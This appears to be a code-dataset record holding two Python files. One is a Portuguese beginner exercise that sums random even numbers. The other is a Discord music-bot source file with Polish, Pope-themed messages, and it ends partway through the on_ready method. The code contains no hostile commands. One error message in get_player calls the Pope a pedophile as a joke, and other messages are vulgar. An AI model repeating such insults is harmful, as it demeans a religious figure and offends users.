Jose0Cicero1Ribeiro0Junior/Curso_em_Videos
|
abb2264c654312e6b823a3a9d4b68e0c999ada3f
|
b0bb4922ea40ff0146b5a7e205fe2f15cd9a297b
|
refs/heads/master
| 2022-12-19T19:18:53.234581
| 2020-10-23T12:29:09
| 2020-10-23T12:29:09
| 288,749,473
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 831
|
py
|
#Exercício Python 100: Faça um programa que tenha uma lista chamada números e duas funções chamadas sorteia() e somaPar(). A primeira função vai sortear 5 números e vai colocá-los dentro da lista e a segunda função vai mostrar a soma entre todos os valores pares sorteados pela função anterior.
from random import randint
from time import sleep
def sorteia(lista):
print('Soreteando 5 valores da lista: ', end='')
for cont in range(0,5):
n = randint(1,10)
lista.append(n)
print(f'{n} ', end='', flush=True)
sleep(0.3)
print('PRONTO!')
def somaPar(lista):
soma = 0
for valor in lista:
if valor % 2 == 0:
soma += valor
print(f'Somando os valores pares de {lista}, temos {soma}')
números = list()
sorteia(números)
somaPar(números)
|
[
"Jose0Cicero1Ribeiro0Junior@outlook.com"
] |
Jose0Cicero1Ribeiro0Junior@outlook.com
|
9c4146cf8d2c46ce68c4b555792e4dfbf0abee79
|
bb0fc24a46415c6780f734e4d7a6d9a8b203b02b
|
/musicbot/bot.py
|
49fe612d7542a775817784cf3f3f7dee10b9d6a2
|
[
"MIT"
] |
permissive
|
EZIO1337/papiezbotv6
|
b1880a1f4401737038c97499036e803def801496
|
dd93f8ca2d43a76517170bd4ea192524d66fb337
|
refs/heads/master
| 2021-05-16T14:41:37.671601
| 2018-01-22T23:25:26
| 2018-01-22T23:25:26
| 118,528,619
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 108,261
|
py
|
import os
import sys
import time
import shlex
import shutil
import random
import inspect
import logging
import asyncio
import pathlib
import traceback
import math
import re
import aiohttp
import discord
import colorlog
from io import BytesIO, StringIO
from functools import wraps
from textwrap import dedent
from datetime import timedelta
from collections import defaultdict
from discord.enums import ChannelType
from discord.ext.commands.bot import _get_variable
from . import exceptions
from . import downloader
from .playlist import Playlist
from .player import MusicPlayer
from .entry import StreamPlaylistEntry
from .opus_loader import load_opus_lib
from .config import Config, ConfigDefaults
from .permissions import Permissions, PermissionsDefaults
from .constructs import SkipState, Response, VoiceStateUpdate
from .utils import load_file, write_file, fixg, ftimedelta, _func_
from .constants import VERSION as BOTVERSION
from .constants import DISCORD_MSG_CHAR_LIMIT, AUDIO_CACHE_PATH
load_opus_lib()
log = logging.getLogger(__name__)
class MusicBot(discord.Client):
def __init__(self, config_file=None, perms_file=None):
try:
sys.stdout.write("\x1b]2;MusicBot {}\x07".format(BOTVERSION))
except:
pass
if config_file is None:
config_file = ConfigDefaults.options_file
if perms_file is None:
perms_file = PermissionsDefaults.perms_file
self.players = {}
self.exit_signal = None
self.init_ok = False
self.cached_app_info = None
self.last_status = None
self.config = Config(config_file)
self.permissions = Permissions(perms_file, grant_all=[self.config.owner_id])
self.blacklist = set(load_file(self.config.blacklist_file))
self.autoplaylist = load_file(self.config.auto_playlist_file)
self.autoplaylist_session = self.autoplaylist[:]
self.aiolocks = defaultdict(asyncio.Lock)
self.downloader = downloader.Downloader(download_folder='audio_cache')
self._setup_logging()
log.info(' MusicBot (version {}) '.format(BOTVERSION).center(50, '='))
if not self.autoplaylist:
log.warning("Autoplaylist is empty, disabling.")
self.config.auto_playlist = False
else:
log.info("Loaded autoplaylist with {} entries".format(len(self.autoplaylist)))
if self.blacklist:
log.debug("Loaded blacklist with {} entries".format(len(self.blacklist)))
# TODO: Do these properly
ssd_defaults = {
'last_np_msg': None,
'auto_paused': False,
'availability_paused': False
}
self.server_specific_data = defaultdict(ssd_defaults.copy)
super().__init__()
self.aiosession = aiohttp.ClientSession(loop=self.loop)
self.http.user_agent += ' MusicBot/%s' % BOTVERSION
def __del__(self):
# These functions return futures but it doesn't matter
try: self.http.session.close()
except: pass
try: self.aiosession.close()
except: pass
super().__init__()
self.aiosession = aiohttp.ClientSession(loop=self.loop)
self.http.user_agent += ' MusicBot/%s' % BOTVERSION
# TODO: Add some sort of `denied` argument for a message to send when someone else tries to use it
def owner_only(func):
@wraps(func)
async def wrapper(self, *args, **kwargs):
# Only allow the owner to use these commands
orig_msg = _get_variable('message')
if not orig_msg or orig_msg.author.id == self.config.owner_id:
# noinspection PyCallingNonCallable
return await func(self, *args, **kwargs)
else:
raise exceptions.PermissionsError("only the owner can use this command", expire_in=30)
return wrapper
def dev_only(func):
@wraps(func)
async def wrapper(self, *args, **kwargs):
orig_msg = _get_variable('message')
if orig_msg.author.id in self.config.dev_ids:
# noinspection PyCallingNonCallable
return await func(self, *args, **kwargs)
else:
raise exceptions.PermissionsError("only dev users can use this command", expire_in=30)
wrapper.dev_cmd = True
return wrapper
def ensure_appinfo(func):
@wraps(func)
async def wrapper(self, *args, **kwargs):
await self._cache_app_info()
# noinspection PyCallingNonCallable
return await func(self, *args, **kwargs)
return wrapper
def _get_owner(self, *, server=None, voice=False):
return discord.utils.find(
lambda m: m.id == self.config.owner_id and (m.voice_channel if voice else True),
server.members if server else self.get_all_members()
)
def _delete_old_audiocache(self, path=AUDIO_CACHE_PATH):
try:
shutil.rmtree(path)
return True
except:
try:
os.rename(path, path + '__')
except:
return False
try:
shutil.rmtree(path)
except:
os.rename(path + '__', path)
return False
return True
def _setup_logging(self):
if len(logging.getLogger(__package__).handlers) > 1:
log.debug("Skipping logger setup, already set up")
return
shandler = logging.StreamHandler(stream=sys.stdout)
shandler.setFormatter(colorlog.LevelFormatter(
fmt = {
'DEBUG': '{log_color}[{levelname}:{module}] {message}',
'INFO': '{log_color}{message}',
'WARNING': '{log_color}{levelname}: {message}',
'ERROR': '{log_color}[{levelname}:{module}] {message}',
'CRITICAL': '{log_color}[{levelname}:{module}] {message}',
'EVERYTHING': '{log_color}[{levelname}:{module}] {message}',
'NOISY': '{log_color}[{levelname}:{module}] {message}',
'VOICEDEBUG': '{log_color}[{levelname}:{module}][{relativeCreated:.9f}] {message}',
'FFMPEG': '{log_color}[{levelname}:{module}][{relativeCreated:.9f}] {message}'
},
log_colors = {
'DEBUG': 'cyan',
'INFO': 'white',
'WARNING': 'yellow',
'ERROR': 'red',
'CRITICAL': 'bold_red',
'EVERYTHING': 'white',
'NOISY': 'white',
'FFMPEG': 'bold_purple',
'VOICEDEBUG': 'purple',
},
style = '{',
datefmt = ''
))
shandler.setLevel(self.config.debug_level)
logging.getLogger(__package__).addHandler(shandler)
log.debug("Set logging level to {}".format(self.config.debug_level_str))
if self.config.debug_mode:
dlogger = logging.getLogger('discord')
dlogger.setLevel(logging.DEBUG)
dhandler = logging.FileHandler(filename='logs/discord.log', encoding='utf-8', mode='w')
dhandler.setFormatter(logging.Formatter('{asctime}:{levelname}:{name}: {message}', style='{'))
dlogger.addHandler(dhandler)
@staticmethod
def _check_if_empty(vchannel: discord.Channel, *, excluding_me=True, excluding_deaf=False):
def check(member):
if excluding_me and member == vchannel.server.me:
return False
if excluding_deaf and any([member.deaf, member.self_deaf]):
return False
return True
return not sum(1 for m in vchannel.voice_members if check(m))
async def _join_startup_channels(self, channels, *, autosummon=True):
joined_servers = set()
channel_map = {c.server: c for c in channels}
def _autopause(player):
if self._check_if_empty(player.voice_client.channel):
log.info("Initial autopause in empty channel")
player.pause()
self.server_specific_data[player.voice_client.channel.server]['auto_paused'] = True
for server in self.servers:
if server.unavailable or server in channel_map:
continue
if server.me.voice_channel:
log.info("Found resumable voice channel {0.server.name}/{0.name}".format(server.me.voice_channel))
channel_map[server] = server.me.voice_channel
if autosummon:
owner = self._get_owner(server=server, voice=True)
if owner:
log.info("Found owner in \"{}\"".format(owner.voice_channel.name))
channel_map[server] = owner.voice_channel
for server, channel in channel_map.items():
if server in joined_servers:
log.info("Already joined a channel in \"{}\", skipping".format(server.name))
continue
if channel and channel.type == discord.ChannelType.voice:
log.info("Attempting to join {0.server.name}/{0.name}".format(channel))
chperms = channel.permissions_for(server.me)
if not chperms.connect:
log.info("Cannot join channel \"{}\", no permission.".format(channel.name))
continue
elif not chperms.speak:
log.info("Will not join channel \"{}\", no permission to speak.".format(channel.name))
continue
try:
player = await self.get_player(channel, create=True, deserialize=self.config.persistent_queue)
joined_servers.add(server)
log.info("Joined {0.server.name}/{0.name}".format(channel))
if player.is_stopped:
player.play()
if self.config.auto_playlist and not player.playlist.entries:
await self.on_player_finished_playing(player)
if self.config.auto_pause:
player.once('play', lambda player, **_: _autopause(player))
except Exception:
log.debug("Error joining {0.server.name}/{0.name}".format(channel), exc_info=True)
log.error("Failed to join {0.server.name}/{0.name}".format(channel))
elif channel:
log.warning("Not joining {0.server.name}/{0.name}, that's a text channel.".format(channel))
else:
log.warning("Invalid channel thing: {}".format(channel))
async def _wait_delete_msg(self, message, after):
await asyncio.sleep(after)
await self.safe_delete_message(message, quiet=True)
# TODO: Check to see if I can just move this to on_message after the response check
async def _manual_delete_check(self, message, *, quiet=False):
if self.config.delete_invoking:
await self.safe_delete_message(message, quiet=quiet)
async def _check_ignore_non_voice(self, msg):
vc = msg.server.me.voice_channel
# If we've connected to a voice chat and we're in the same voice channel
if not vc or vc == msg.author.voice_channel:
return True
else:
raise exceptions.PermissionsError(
"you cannot use this command when not in the voice channel (%s)" % vc.name, expire_in=30)
async def _cache_app_info(self, *, update=False):
if not self.cached_app_info and not update and self.user.bot:
log.debug("Caching app info")
self.cached_app_info = await self.application_info()
return self.cached_app_info
async def remove_from_autoplaylist(self, song_url:str, *, ex:Exception=None, delete_from_ap=False):
if song_url not in self.autoplaylist:
log.debug("URL \"{}\" not in autoplaylist, ignoring".format(song_url))
return
async with self.aiolocks[_func_()]:
self.autoplaylist.remove(song_url)
log.info("Removing unplayable song from autoplaylist: %s" % song_url)
with open(self.config.auto_playlist_removed_file, 'a', encoding='utf8') as f:
f.write(
'# Entry removed {ctime}\n'
'# Reason: {ex}\n'
'{url}\n\n{sep}\n\n'.format(
ctime=time.ctime(),
ex=str(ex).replace('\n', '\n#' + ' ' * 10), # 10 spaces to line up with # Reason:
url=song_url,
sep='#' * 32
))
if delete_from_ap:
log.info("Updating autoplaylist")
write_file(self.config.auto_playlist_file, self.autoplaylist)
@ensure_appinfo
async def generate_invite_link(self, *, permissions=discord.Permissions(70380544), server=None):
return discord.utils.oauth_url(self.cached_app_info.id, permissions=permissions, server=server)
async def join_voice_channel(self, channel):
if isinstance(channel, discord.Object):
channel = self.get_channel(channel.id)
if getattr(channel, 'type', ChannelType.text) != ChannelType.voice:
raise discord.InvalidArgument('Channel passed must be a voice channel')
server = channel.server
if self.is_voice_connected(server):
raise discord.ClientException('Already connected to a voice channel in this server')
def session_id_found(data):
user_id = data.get('user_id')
guild_id = data.get('guild_id')
return user_id == self.user.id and guild_id == server.id
log.voicedebug("(%s) creating futures", _func_())
# register the futures for waiting
session_id_future = self.ws.wait_for('VOICE_STATE_UPDATE', session_id_found)
voice_data_future = self.ws.wait_for('VOICE_SERVER_UPDATE', lambda d: d.get('guild_id') == server.id)
# "join" the voice channel
log.voicedebug("(%s) setting voice state", _func_())
await self.ws.voice_state(server.id, channel.id)
log.voicedebug("(%s) waiting for session id", _func_())
session_id_data = await asyncio.wait_for(session_id_future, timeout=15, loop=self.loop)
# sometimes it gets stuck on this step. Jake said to wait indefinitely. To hell with that.
log.voicedebug("(%s) waiting for voice data", _func_())
data = await asyncio.wait_for(voice_data_future, timeout=15, loop=self.loop)
kwargs = {
'user': self.user,
'channel': channel,
'data': data,
'loop': self.loop,
'session_id': session_id_data.get('session_id'),
'main_ws': self.ws
}
voice = discord.VoiceClient(**kwargs)
try:
log.voicedebug("(%s) connecting...", _func_())
with aiohttp.Timeout(15):
await voice.connect()
except asyncio.TimeoutError as e:
log.voicedebug("(%s) connection failed, disconnecting", _func_())
try:
await voice.disconnect()
except:
pass
raise e
log.voicedebug("(%s) connection successful", _func_())
self.connection._add_voice_client(server.id, voice)
return voice
async def get_voice_client(self, channel: discord.Channel):
if isinstance(channel, discord.Object):
channel = self.get_channel(channel.id)
if getattr(channel, 'type', ChannelType.text) != ChannelType.voice:
raise AttributeError('Channel passed must be a voice channel')
async with self.aiolocks[_func_() + ':' + channel.server.id]:
if self.is_voice_connected(channel.server):
return self.voice_client_in(channel.server)
vc = None
t0 = t1 = 0
tries = 5
for attempt in range(1, tries+1):
log.debug("Connection attempt {} to {}".format(attempt, channel.name))
t0 = time.time()
try:
vc = await self.join_voice_channel(channel)
t1 = time.time()
break
except asyncio.TimeoutError:
log.warning("Failed to connect, retrying ({}/{})".format(attempt, tries))
# TODO: figure out if I need this or not
# try:
# await self.ws.voice_state(channel.server.id, None)
# except:
# pass
except:
log.exception("Unknown error attempting to connect to voice")
await asyncio.sleep(0.5)
if not vc:
log.critical("Voice client is unable to connect, restarting...")
await self.restart()
log.debug("Connected in {:0.1f}s".format(t1-t0))
log.info("Connected to {}/{}".format(channel.server, channel))
vc.ws._keep_alive.name = 'VoiceClient Keepalive'
return vc
async def reconnect_voice_client(self, server, *, sleep=0.1, channel=None):
log.debug("Reconnecting voice client on \"{}\"{}".format(
server, ' to "{}"'.format(channel.name) if channel else ''))
async with self.aiolocks[_func_() + ':' + server.id]:
vc = self.voice_client_in(server)
if not (vc or channel):
return
_paused = False
player = self.get_player_in(server)
if player and player.is_playing:
log.voicedebug("(%s) Pausing", _func_())
player.pause()
_paused = True
log.voicedebug("(%s) Disconnecting", _func_())
try:
await vc.disconnect()
except:
pass
if sleep:
log.voicedebug("(%s) Sleeping for %s", _func_(), sleep)
await asyncio.sleep(sleep)
if player:
log.voicedebug("(%s) Getting voice client", _func_())
if not channel:
new_vc = await self.get_voice_client(vc.channel)
else:
new_vc = await self.get_voice_client(channel)
log.voicedebug("(%s) Swapping voice client", _func_())
await player.reload_voice(new_vc)
if player.is_paused and _paused:
log.voicedebug("Resuming")
player.resume()
log.debug("Reconnected voice client on \"{}\"{}".format(
server, ' to "{}"'.format(channel.name) if channel else ''))
async def disconnect_voice_client(self, server):
vc = self.voice_client_in(server)
if not vc:
return
if server.id in self.players:
self.players.pop(server.id).kill()
await vc.disconnect()
async def disconnect_all_voice_clients(self):
for vc in list(self.voice_clients).copy():
await self.disconnect_voice_client(vc.channel.server)
async def set_voice_state(self, vchannel, *, mute=False, deaf=False):
if isinstance(vchannel, discord.Object):
vchannel = self.get_channel(vchannel.id)
if getattr(vchannel, 'type', ChannelType.text) != ChannelType.voice:
raise AttributeError('Channel passed must be a voice channel')
await self.ws.voice_state(vchannel.server.id, vchannel.id, mute, deaf)
# I hope I don't have to set the channel here
# instead of waiting for the event to update it
def get_player_in(self, server: discord.Server) -> MusicPlayer:
return self.players.get(server.id)
async def get_player(self, channel, create=False, *, deserialize=False) -> MusicPlayer:
server = channel.server
async with self.aiolocks[_func_() + ':' + server.id]:
if deserialize:
voice_client = await self.get_voice_client(channel)
player = await self.deserialize_queue(server, voice_client)
if player:
log.debug("Created player via deserialization for server %s with %s entries", server.id, len(player.playlist))
# Since deserializing only happens when the bot starts, I should never need to reconnect
return self._init_player(player, server=server)
if server.id not in self.players:
if not create:
raise exceptions.CommandError(
'Papież nie jest na kanale głosowym.. '
'Zawołaj pedofila używając %sdj aby wezwać najlepszego Didżeja w Watykanie!' % self.config.command_prefix)
voice_client = await self.get_voice_client(channel)
playlist = Playlist(self)
player = MusicPlayer(self, voice_client, playlist)
self._init_player(player, server=server)
async with self.aiolocks[self.reconnect_voice_client.__name__ + ':' + server.id]:
if self.players[server.id].voice_client not in self.voice_clients:
log.debug("Reconnect required for voice client in {}".format(server.name))
await self.reconnect_voice_client(server, channel=channel)
return self.players[server.id]
def _init_player(self, player, *, server=None):
player = player.on('graj', self.on_player_play) \
.on('odpauzuj', self.on_player_resume) \
.on('pauza', self.on_player_pause) \
.on('stop', self.on_player_stop) \
.on('finished-playing', self.on_player_finished_playing) \
.on('entry-added', self.on_player_entry_added) \
.on('error', self.on_player_error)
player.skip_state = SkipState()
if server:
self.players[server.id] = player
return player
async def on_player_play(self, player, entry):
await self.update_now_playing_status(entry)
player.skip_state.reset()
# This is the one event where its ok to serialize autoplaylist entries
await self.serialize_queue(player.voice_client.channel.server)
channel = entry.meta.get('kanał', None)
author = entry.meta.get('autor', None)
if channel and author:
last_np_msg = self.server_specific_data[channel.server]['last_np_msg']
if last_np_msg and last_np_msg.channel == channel:
async for lmsg in self.logs_from(channel, limit=1):
if lmsg != last_np_msg and last_np_msg:
await self.safe_delete_message(last_np_msg)
self.server_specific_data[channel.server]['last_np_msg'] = None
break # This is probably redundant
if self.config.now_playing_mentions:
newmsg = '%s - twoja piosenka **%s** jest grana na kanale %s!' % (
entry.meta['autor'].mention, entry.title, player.voice_client.channel.name)
else:
newmsg = 'Napierdalamy na %s: **%s**' % (
player.voice_client.channel.name, entry.title)
if self.server_specific_data[channel.server]['last_np_msg']:
self.server_specific_data[channel.server]['last_np_msg'] = await self.safe_edit_message(last_np_msg, newmsg, send_if_fail=True)
else:
self.server_specific_data[channel.server]['last_np_msg'] = await self.safe_send_message(channel, newmsg)
# TODO: Check channel voice state?
async def on_player_resume(self, player, entry, **_):
await self.update_now_playing_status(entry)
async def on_player_pause(self, player, entry, **_):
await self.update_now_playing_status(entry, True)
# await self.serialize_queue(player.voice_client.channel.server)
async def on_player_stop(self, player, **_):
await self.update_now_playing_status()
async def on_player_finished_playing(self, player, **_):
if not player.playlist.entries and not player.current_entry and self.config.auto_playlist:
if not self.autoplaylist_session:
log.info("Autoplaylista pusta,napierdalam własną....")
self.autoplaylist_session = self.autoplaylist[:]
while self.autoplaylist_session:
random.shuffle(self.autoplaylist_session)
song_url = random.choice(self.autoplaylist_session)
self.autoplaylist_session.remove(song_url)
info = {}
try:
info = await self.downloader.extract_info(player.playlist.loop, song_url, download=False, process=False)
except downloader.youtube_dl.utils.DownloadError as e:
if 'Youtube powiedział:' in e.args[0]:
# url is bork, remove from list and put in removed list
log.error("Błąd na youtube url:\n{}".format(e.args[0]))
else:
# Probably an error from a different extractor, but I've only seen youtube's
log.error("Błąd \"{url}\": {ex}".format(url=song_url, ex=e))
await self.remove_from_autoplaylist(song_url, ex=e, delete_from_ap=True)
continue
except Exception as e:
log.error("Błąd \"{url}\": {ex}".format(url=song_url, ex=e))
log.exception()
self.autoplaylist.remove(song_url)
continue
if info.get('entries', None): # or .get('_type', '') == 'playlist'
log.debug("Ta playlista jest nie fajna,przewijam.")
# TODO: Playlist expansion
# Do I check the initial conditions again?
# not (not player.playlist.entries and not player.current_entry and self.config.auto_playlist)
try:
await player.playlist.add_entry(song_url, channel=None, author=None)
except exceptions.ExtractionError as e:
log.error("Błąd w trakcie przesyłania nutki z autoplaylisty: {}".format(e))
log.debug('', exc_info=True)
continue
break
if not self.autoplaylist:
# TODO: When I add playlist expansion, make sure that's not happening during this check
log.warning("Wyłączam autoplayliste.")
self.config.auto_playlist = False
else: # Don't serialize for autoplaylist events
await self.serialize_queue(player.voice_client.channel.server)
async def on_player_entry_added(self, player, playlist, entry, **_):
if entry.meta.get('autor') and entry.meta.get('kanał'):
await self.serialize_queue(player.voice_client.channel.server)
async def on_player_error(self, player, entry, ex, **_):
if 'kanał' in entry.meta:
await self.safe_send_message(
entry.meta['kanał'],
"```\nError from FFmpeg:\n{}\n```".format(ex)
)
else:
log.exception("Player error", exc_info=ex)
async def update_now_playing_status(self, entry=None, is_paused=False):
game = None
if not self.config.status_message:
if self.user.bot:
activeplayers = sum(1 for p in self.players.values() if p.is_playing)
if activeplayers > 1:
game = discord.Game(type=0, name="music on %s servers" % activeplayers)
entry = None
elif activeplayers == 1:
player = discord.utils.get(self.players.values(), is_playing=True)
entry = player.current_entry
if entry:
prefix = u'\u275A\u275A ' if is_paused else ''
name = u'{}{}'.format(prefix, entry.title)[:128]
game = discord.Game(type=0, name=name)
else:
game = discord.Game(type=0, name=self.config.status_message.strip()[:128])
async with self.aiolocks[_func_()]:
if game != self.last_status:
await self.change_presence(game=game)
self.last_status = game
async def update_now_playing_message(self, server, message, *, channel=None):
lnp = self.server_specific_data[server]['last_np_msg']
m = None
if message is None and lnp:
await self.safe_delete_message(lnp, quiet=True)
elif lnp: # If there was a previous lp message
oldchannel = lnp.channel
if lnp.channel == oldchannel: # If we have a channel to update it in
async for lmsg in self.logs_from(channel, limit=1):
if lmsg != lnp and lnp: # If we need to resend it
await self.safe_delete_message(lnp, quiet=True)
m = await self.safe_send_message(channel, message, quiet=True)
else:
m = await self.safe_edit_message(lnp, message, send_if_fail=True, quiet=False)
elif channel: # If we have a new channel to send it to
await self.safe_delete_message(lnp, quiet=True)
m = await self.safe_send_message(channel, message, quiet=True)
else: # we just resend it in the old channel
await self.safe_delete_message(lnp, quiet=True)
m = await self.safe_send_message(oldchannel, message, quiet=True)
elif channel: # No previous message
m = await self.safe_send_message(channel, message, quiet=True)
self.server_specific_data[server]['last_np_msg'] = m
async def serialize_queue(self, server, *, dir=None):
"""
Serialize the current queue for a server's player to json.
"""
player = self.get_player_in(server)
if not player:
return
if dir is None:
dir = 'data/%s/queue.json' % server.id
async with self.aiolocks['queue_serialization'+':'+server.id]:
log.debug("Serializing queue for %s", server.id)
with open(dir, 'w', encoding='utf8') as f:
f.write(player.serialize(sort_keys=True))
async def serialize_all_queues(self, *, dir=None):
coros = [self.serialize_queue(s, dir=dir) for s in self.servers]
await asyncio.gather(*coros, return_exceptions=True)
async def deserialize_queue(self, server, voice_client, playlist=None, *, dir=None) -> MusicPlayer:
"""
Deserialize a saved queue for a server into a MusicPlayer. If no queue is saved, returns None.
"""
if playlist is None:
playlist = Playlist(self)
if dir is None:
dir = 'data/%s/queue.json' % server.id
async with self.aiolocks['queue_serialization' + ':' + server.id]:
if not os.path.isfile(dir):
return None
log.debug("Deserializing queue for %s", server.id)
with open(dir, 'r', encoding='utf8') as f:
data = f.read()
return MusicPlayer.from_json(data, self, voice_client, playlist)
@ensure_appinfo
async def _on_ready_sanity_checks(self):
# Ensure folders exist
await self._scheck_ensure_env()
# Server permissions check
await self._scheck_server_permissions()
# playlists in autoplaylist
await self._scheck_autoplaylist()
# config/permissions async validate?
await self._scheck_configs()
async def _scheck_ensure_env(self):
log.debug("Ensuring data folders exist")
for server in self.servers:
pathlib.Path('data/%s/' % server.id).mkdir(exist_ok=True)
with open('data/server_names.txt', 'w', encoding='utf8') as f:
for server in sorted(self.servers, key=lambda s:int(s.id)):
f.write('{:<22} {}\n'.format(server.id, server.name))
if not self.config.save_videos and os.path.isdir(AUDIO_CACHE_PATH):
if self._delete_old_audiocache():
log.debug("Deleted old audio cache")
else:
log.debug("Could not delete old audio cache, moving on.")
async def _scheck_server_permissions(self):
log.debug("Checking server permissions")
pass # TODO
async def _scheck_autoplaylist(self):
log.debug("Auditing autoplaylist")
pass # TODO
async def _scheck_configs(self):
log.debug("Validating config")
await self.config.async_validate(self)
log.debug("Validating permissions config")
await self.permissions.async_validate(self)
#######################################################################################################################
async def safe_send_message(self, dest, content, **kwargs):
tts = kwargs.pop('tts', False)
quiet = kwargs.pop('quiet', False)
expire_in = kwargs.pop('expire_in', 0)
allow_none = kwargs.pop('allow_none', True)
also_delete = kwargs.pop('also_delete', None)
msg = None
lfunc = log.debug if quiet else log.warning
try:
if content is not None or allow_none:
msg = await self.send_message(dest, content, tts=tts)
except discord.Forbidden:
lfunc("Cannot send message to \"%s\", no permission", dest.name)
except discord.NotFound:
lfunc("Cannot send message to \"%s\", invalid channel?", dest.name)
except discord.HTTPException:
if len(content) > DISCORD_MSG_CHAR_LIMIT:
lfunc("WIADOMOŚĆ JEST ZA DUŻA(%s)", DISCORD_MSG_CHAR_LIMIT)
else:
lfunc("Błąd w trakcie wysyłania wiadomośći")
log.noise("Got HTTPException trying to send message to %s: %s", dest, content)
finally:
if msg and expire_in:
asyncio.ensure_future(self._wait_delete_msg(msg, expire_in))
if also_delete and isinstance(also_delete, discord.Message):
asyncio.ensure_future(self._wait_delete_msg(also_delete, expire_in))
return msg
async def safe_delete_message(self, message, *, quiet=False):
lfunc = log.debug if quiet else log.warning
try:
return await self.delete_message(message)
except discord.Forbidden:
lfunc("Cannot delete message \"{}\", no permission".format(message.clean_content))
except discord.NotFound:
lfunc("Cannot delete message \"{}\", message not found".format(message.clean_content))
async def safe_edit_message(self, message, new, *, send_if_fail=False, quiet=False):
lfunc = log.debug if quiet else log.warning
try:
return await self.edit_message(message, new)
except discord.NotFound:
lfunc("Cannot edit message \"{}\", message not found".format(message.clean_content))
if send_if_fail:
lfunc("Sending message instead")
return await self.safe_send_message(message.channel, new)
async def send_typing(self, destination):
try:
return await super().send_typing(destination)
except discord.Forbidden:
log.warning("Could not send typing to {}, no permission".format(destination))
async def edit_profile(self, **fields):
if self.user.bot:
return await super().edit_profile(**fields)
else:
return await super().edit_profile(self.config._password,**fields)
async def restart(self):
self.exit_signal = exceptions.RestartSignal()
await self.logout()
def restart_threadsafe(self):
asyncio.run_coroutine_threadsafe(self.restart(), self.loop)
def _cleanup(self):
try:
self.loop.run_until_complete(self.logout())
except: pass
pending = asyncio.Task.all_tasks()
gathered = asyncio.gather(*pending)
try:
gathered.cancel()
self.loop.run_until_complete(gathered)
gathered.exception()
except: pass
# noinspection PyMethodOverriding
def run(self):
try:
self.loop.run_until_complete(self.start(*self.config.auth))
except discord.errors.LoginFailure:
# Add if token, else
raise exceptions.HelpfulError(
"Bot cannot login, bad credentials.",
"Fix your %s in the options file. "
"Remember that each field should be on their own line."
% ['shit', 'Token', 'Email/Password', 'Credentials'][len(self.config.auth)]
) # ^^^^ In theory self.config.auth should never have no items
finally:
try:
self._cleanup()
except Exception:
log.error("Error in cleanup", exc_info=True)
self.loop.close()
if self.exit_signal:
raise self.exit_signal
async def logout(self):
await self.disconnect_all_voice_clients()
return await super().logout()
async def on_error(self, event, *args, **kwargs):
ex_type, ex, stack = sys.exc_info()
if ex_type == exceptions.HelpfulError:
log.error("Exception in {}:\n{}".format(event, ex.message))
await asyncio.sleep(2) # don't ask
await self.logout()
elif issubclass(ex_type, exceptions.Signal):
self.exit_signal = ex_type
await self.logout()
else:
log.error("Exception in {}".format(event), exc_info=True)
async def on_resumed(self):
log.info("\nReconnected to discord.\n")
async def on_ready(self):
dlogger = logging.getLogger('discord')
for h in dlogger.handlers:
if getattr(h, 'terminator', None) == '':
dlogger.removeHandler(h)
print()
log.debug("Connection established, ready to go.")
self.ws._keep_alive.name = 'Gateway Keepalive'
if self.init_ok:
log.debug("Received additional READY event, may have failed to resume")
return
await self._on_ready_sanity_checks()
print()
log.info('Connected to Discord!')
self.init_ok = True
################################
log.info("Bot: {0}/{1}#{2}{3}".format(
self.user.id,
self.user.name,
self.user.discriminator,
' [BOT]' if self.user.bot else ' [Userbot]'
))
owner = self._get_owner(voice=True) or self._get_owner()
if owner and self.servers:
log.info("Owner: {0}/{1}#{2}\n".format(
owner.id,
owner.name,
owner.discriminator
))
log.info('Server List:')
[log.info(' - ' + s.name) for s in self.servers]
elif self.servers:
log.warning("Owner could not be found on any server (id: %s)\n" % self.config.owner_id)
log.info('Server List:')
[log.info(' - ' + s.name) for s in self.servers]
else:
log.warning("Owner unknown, bot is not on any servers.")
if self.user.bot:
log.warning(
"To make the bot join a server, paste this link in your browser. \n"
"Note: You should be logged into your main account and have \n"
"manage server permissions on the server you want the bot to join.\n"
" " + await self.generate_invite_link()
)
print(flush=True)
if self.config.bound_channels:
chlist = set(self.get_channel(i) for i in self.config.bound_channels if i)
chlist.discard(None)
invalids = set()
invalids.update(c for c in chlist if c.type == discord.ChannelType.voice)
chlist.difference_update(invalids)
self.config.bound_channels.difference_update(invalids)
if chlist:
log.info("Bound to text channels:")
[log.info(' - {}/{}'.format(ch.server.name.strip(), ch.name.strip())) for ch in chlist if ch]
else:
print("Not bound to any text channels")
if invalids and self.config.debug_mode:
print(flush=True)
log.info("Not binding to voice channels:")
[log.info(' - {}/{}'.format(ch.server.name.strip(), ch.name.strip())) for ch in invalids if ch]
print(flush=True)
else:
log.info("Not bound to any text channels")
if self.config.autojoin_channels:
chlist = set(self.get_channel(i) for i in self.config.autojoin_channels if i)
chlist.discard(None)
invalids = set()
invalids.update(c for c in chlist if c.type == discord.ChannelType.text)
chlist.difference_update(invalids)
self.config.autojoin_channels.difference_update(invalids)
if chlist:
log.info("Autojoining voice chanels:")
[log.info(' - {}/{}'.format(ch.server.name.strip(), ch.name.strip())) for ch in chlist if ch]
else:
log.info("Not autojoining any voice channels")
if invalids and self.config.debug_mode:
print(flush=True)
log.info("Cannot autojoin text channels:")
[log.info(' - {}/{}'.format(ch.server.name.strip(), ch.name.strip())) for ch in invalids if ch]
autojoin_channels = chlist
else:
log.info("Not autojoining any voice channels")
autojoin_channels = set()
print(flush=True)
log.info("Options:")
log.info(" Command prefix: " + self.config.command_prefix)
log.info(" Default volume: {}%".format(int(self.config.default_volume * 100)))
log.info(" Skip threshold: {} votes or {}%".format(
self.config.skips_required, fixg(self.config.skip_ratio_required * 100)))
log.info(" Now Playing @mentions: " + ['Disabled', 'Enabled'][self.config.now_playing_mentions])
log.info(" Auto-Summon: " + ['Disabled', 'Enabled'][self.config.auto_summon])
log.info(" Auto-Playlist: " + ['Disabled', 'Enabled'][self.config.auto_playlist])
log.info(" Auto-Pause: " + ['Disabled', 'Enabled'][self.config.auto_pause])
log.info(" Delete Messages: " + ['Disabled', 'Enabled'][self.config.delete_messages])
if self.config.delete_messages:
log.info(" Delete Invoking: " + ['Disabled', 'Enabled'][self.config.delete_invoking])
log.info(" Debug Mode: " + ['Disabled', 'Enabled'][self.config.debug_mode])
log.info(" Downloaded songs will be " + ['deleted', 'saved'][self.config.save_videos])
if self.config.status_message:
log.info(" Status message: " + self.config.status_message)
print(flush=True)
